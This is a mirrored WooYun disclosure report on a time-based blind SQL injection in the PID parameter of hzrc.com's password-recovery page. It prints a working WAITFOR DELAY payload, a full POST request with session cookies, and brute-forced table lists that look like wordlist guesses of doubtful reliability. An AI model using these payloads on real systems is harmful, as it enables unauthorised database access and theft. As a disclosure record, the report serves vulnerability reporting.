乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-11-07: 厂商已经主动忽略漏洞,细节向公众公开
杭州人才网手机站Post注入
http://3g.hzrc.com/Qz/PGetPassWord.aspx
注入参数:PID
Parameter: PID Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTc4NDQ1OTY1OGRk0D8rA/ICqoNK17bQjSqqyFTO ZA=&PID=aaaaa' WAITFOR DELAY '0:0:5'--&SubmitMain=%CC%E1 %BD%BB
能暴力跑#1
Current database[8 tables]+----------------+| Market || adblocks || autorizacaonfe || binn_sprav || comp_group || object || pc || typecompte |+----------------+
#2
还有主站http://www.hzrc.com/qz/PGetPassword.aspx
------------------主站---------------------------------------
POST /Qz/PGetPassWord.aspx HTTP/1.1Host: www.hzrc.comProxy-Connection: keep-aliveContent-Length: 303Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.hzrc.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.hzrc.com/Qz/PGetPassWord.aspxAccept-Encoding: gzip,deflateaAccept-Language: zh-CN,zh;q=0.8Cookie: __utma=1.1810421980.1411273058.1411273058.1411273058.1; __utmz=1.1411273058.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=aeyqkk45kb0umrybbztiqo55; NetType=TEL; UniqueV=C968D57A27108FD2338845AB; vConfirm=#MC_summit; CNZZDATA2145298=cnzz_eid%3D2002817278-1411268720-http%253A%252F%252Fz7.cc%252F%26ntime%3D1411375294__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE3NzAzMzUzNg9kFgICAQ9kFgICBg9kFgRmDxYCHgRUZXh0ZWQCBA8WAh8AZWRk%2FWmhYjK8LPtq%2FrrkPVF6G2mBk7E%3D&__VIEWSTATEGENERATOR=3E4BC614&PID=aaaaa%27&SubmitMain=%CC%E1+%BD%BB&Left%3ALoginName_=&Left%3APassWord_=&KJs=8&Left%3AUniqueV=C968D57A27108FD2338845AB
Current database[104 tables]+------------------------------+| Admins || Benutzerliste || Class_Def_Table || ConsultantsTable || CurrentUsers || D_PR_PARTES || EPIXEIRISI || Kategorie || Kontakt || MyTicketek || PROFILE || PS_DMK || R1IDF || R2Sum || SGA_XPLAN_TPL_V$SQL || SYNALLAGI || Series || Severity || Station_Comment || Tagebuch || account_multi || address_book || administrators || adresse || ads || agence || aliasregex || artikel_variationsgruppen || auth || backup || bestellung_kunde || binn_basket_templ || binn_calendar_temps || binn_forum_maillist || binn_maillist || binn_news_temps || binn_rubrikator_tlevel || buecher || cdb_admingroups || chromosomes || crops_tpl || css_file || div_aa_annotation || dokumente || endereco || estado || fk_test_has_fk || form_data || forum_cat || gruppen || guanli || guava_themes || hoeren || id || jos_bannertrack || jos_vm_orders || jos_vm_shipping_rate || kauf_artikel || kbase_category || mima || mtb_pref || music_association || nom || nuke_bbauth_access || nuke_bbposts_text || nuke_bbranks || nuke_bbvote_results || oil_bannerclient || oil_bfsurvey_pro_categories || oil_categories || oil_content_rating || oil_core_acl_aro_sections || pessoa || phpbb_confirm || phpbb_disallow || phpbb_privmsgs || phpbb_vote_desc || phpbb_words || poll_user || product || protocol || pruefen || quantri || questions || rel_person_organization || rel_person_topic || soraldo_ele_tipo || spip_messages || spip_petitions || study_user || tx_tcdirectmail_targets || tx_templavoila_datastructure || u_pass || userpassword || usuarios || verkaeufer || versandkostenpreise || vertreter || visual || vrls_xref_listing_type || windows || wp_linkcategories || zahlung_weitere || zones |+------------------------------+
未能联系到厂商或者厂商积极拒绝